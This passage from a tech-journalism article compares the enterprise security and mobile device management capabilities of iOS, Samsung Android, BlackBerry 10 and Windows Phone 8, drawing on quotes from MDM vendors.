e BYOD phenomenon is old news, with support from most companies. For IT organizations, that means ensuring proper security and management over the mobile devices employees are likely to use. In the last year, Apple’s iPhone and iPad have become the new corporate standardsdue to high user satisfaction and superior security capabilities. iOS 7 pushes Apple’s management and security into new areas, including application management and licensing.

But Samsung has been aggressively promoting its SAFE (Samsung Approved for Enterprise) extensions to Android and its add-on Knox management APIs to bolster its reach into businesses wary of Google’s historic lack of concern for security and the rampant malware on Android devices. SAFE targets the first concern. BlackBerry, once the IT darling due to its hundreds of security capabilities, is also trying to gain corporate respect with BlackBerry 10, which supports basic Exchange ActiveSync (EAS) policies out of the box (a first for BlackBerry), as well as a rich set of security features in its retooled BES 10 management server.

Then there’s Windows Phone 8, the third version of Microsoft’s attempt to deliver a popular smartphone OS. It’s historically given little heed to security concerns, but Version 8 endeavors to satisfy basic business security concerns. And the forthcoming Windows Phone 8.1 increases its capabilities even further.

Mobile security falls into two fundamental forms: Microsoft’s EAS policies and native APIs.

Exchange ActiveSync policy support compared
Microsoft Exchange, Microsoft System Center 2012, Google Docs for Business, and various third-party management tools support EAS policies out of the box. According to mobile analyst Chris Hazelton at the 451 Group, the core EAS policies cover most businesses’ needs. But as Table 1 on the next page shows, the various mobile OSes support different EAS policies; EAS support in and of itself doesn’t tell you what security level you get.

Apple’s iOS 4.2 was the first major modern mobile OS to support EAS policies, and it helped catapult the iPhone to enterprise dominance. Since then, Google has increased Android’s EAS coverage in each version, with Android 4 supporting more EAS policies than previous versions. Samsung, the leading Android maker, has added policy support as well as APIs to Android 4 to many of its devices. (I detail which EAS policies each version of Android and Windows Phone support in the article “How Windows Phone 8 security compares to iOS and Android.”)

When you compare Windows Phone 8’s EAS policy support to that of Windows Phone 7.5, there’s not much difference. “Microsoft has not really added much on the management end,” notes J.P. Halebeed, global director of R&D at mobile device management (MDM) vendor AirWatch. A critical addition is support for encryption on the device (it’s on by default for internal storage, but not for SD cards) and the related support for EAS’s encryption policies. The lack of support for encryption had been one of the biggest barriers to Windows Phone’s business acceptance. Microsoft also supports the new information rights management (IRM) EAS policy, which lets companies enable rights management for data on devices; Microsoft of course has a corresponding IRM server product. But Windopws Phone 8.1 does make some real leaps forward, as the tables in this article show.

Finally, BlackBerry added EAS support to the new BlackBerry 10 OS; previous versions could be secured only through the BlackBerry Enterprise Server (BES).

Table 1: EAS policy support compared

(“MDM” means a separate mobile device management server is required)

Native security and management API capabilities compared
The other form of mobile security comes from the APIs in each mobile OS. These APIs vary widely across the OSes, and each requires a management tool. Many MDM tools support multiple mobile OSes, providing a single console for IT admins. Some also offer client apps that add capabilities not found in the native APIs, though this typically forces users to opt for proprietary email and other apps for business purposes. Table 2 on the next page shows some of the more commonly requested management features typically implemented through APIs.

Apple, for example, has several dozen such APIs that use remotely installed configuration profiles not only to configure various iOS settings (such as preconfiguring VPN or allowed access points) but also to manage app behavior (such as disallowing the forwarding of corporate messages via personal accounts in Mail). iOS 6 added several new policies, including the ability to prevent app removal, lock a user to a specific app (such as for kiosk or retail usage), and prevent paid apps from being purchased. All are part of what iOS calls a supervised environment, in which the iPhone or iPad is treated as an appliance. iOS 7 adds a set of APIs for application management, including managed Open In, per-app VPNs, managed copy and paste across apps, and single sign-on, as well as true license management and profile-based app installation.

Along the same lines, in Windows Phone 8, Microsoft supports the ability to revoke applications, restrict email forwarding, remotely enroll or unenroll devices, and remotely update business-provisioned apps. One capability in Windows Phone 8 not available to other mobile OSes is its integration with Active Directory, notes Ahmed Datoo, vice president of marketing at MDM vendor Zenprise. This means that MDM tools such as Zenprise’s can access the Active Directory groups, then assign policies to those groups rather than maintain a separate set of groups in the MDM tool from the set in Active Directory. That’s a time-saver for IT, he notes; it reduces the risk of employees not being in the correct groups for the policies that should apply or falling through the cracks when terminated in, say, Active Directory but not in the MDM tool’s user database.

Microsoft and Google provide far fewer such capabilities in their APIs, though Samsung and Google’s Motorola Mobility unit have added their own security APIs to their Android 4 devices. For example, Samsung’s SAFE APIs allow IT admins to disable cameras, Bluetooth, tethering, voice recording, SD cards, and Wi-Fi.

Microsoft uses a central manager in Windows Phone 8 called DM Client that contains all the relevant user and corporate profiles (like the Windows Registry, in effect), rather than rely on a set of separate installed configuration profiles (like the OS X System Folder, in effect). And on September 17, Microsoft finally attained FIPS 140-2 certification, joining BlackBerry 10, iOS 6 and 7, and Samsung SAFE Android devices for this key federal security standard. 

Then there’s BlackBerry, the godfather of mobile security and management. Its BES offers hundreds of controls, and its Balance technology lets IT create a partition on a BlackBerry 10 device to keep personal and work apps and data separate. BlackBerry has a fairly confusing set of MDM products as it transitions from its old BlackBerry platform to the new one; I detail its various MDM products and how they relate in the article “BlackBerry’s road map to unified mobile management.”

Table 2: Other native management capabilities compared

(Typically requires a mobile device management server to use)

How to think about mobile device management
Ojas Rege, vice president of strategy at MDM vendor MobileIron, describes three bands of management requirements that IT should be thinking about.

The first set of requirements is around configuration and protection of lost or compromised devices. That typically requires password enforcement, encryption enforcement, remote lock and wipe, remote email configuration, certificates for identity, remote connectivity configuration (such as for Wi-Fi and VPNs, though he says this configuration capability is not essential if usage is just for email and over cellular networks), and detection of compromised OSes (such as jailbroken, rooted, or malware-infected ones).

The second set of requirements is around data loss prevention (DLP), which covers privacy controls (such as for user location), cloud-usage controls (such as for iCloud, SkyDrive, and Google Docs), and email DLP controls (such as the ability to restrict email forwarding and to protect attachments). “More regulated environments may require No. 2, and these policies are still TBD for Windows Phone,” Rege notes. By contrast, iOS, BlackBerry, and Android have supported most of these needs since (respectively) iOS 4, BES 5, and Android 3, though a few — such as managing email forwards — are handled outside the OS by MDM clients such as MobileIron’s.

The third set of requirements is around apps, such as their provisioning and data security. Although both Apple and Microsoft have mechanisms to do at least basic app management — iOS can essentially hide an app so that it’s no longer available to a user, and Windows Phone 8 can update corporate apps remotely — mobile application management (MAM) capabilities are mostly up to the mobile management vendors to deploy, Rege says.

All the app stores but Google’s are highly curated. For their mobile OSes, Microsoft and BlackBerry copied Apple’s curated approach, which has kept malware off iOS. Android has no such rigorous control, and although Google now spends more effort to analyze apps, the Google Play market is full of malware. The feds recently announced that industrial-class spyware used in advanced persistent threats has now entered the Google Play market.

All four platforms provide mechanisms for businesses to deploy their own apps directly to users, so they can deploy and manage corporate apps separately from those that users get from the app store. Mobile mangement tools can connect these mechanisms to group policies and content-management controls.

It’s a no-brainer that iOS and BlackBerry 10 have what it takes for almost any business’s security needs. Android, especially if you get Samsung or Motorola devices, is a plausible platform if you’re not worried about the malware potential. Meanwhile, Windows Phone holds down the rear, appropriate for low-security requirements.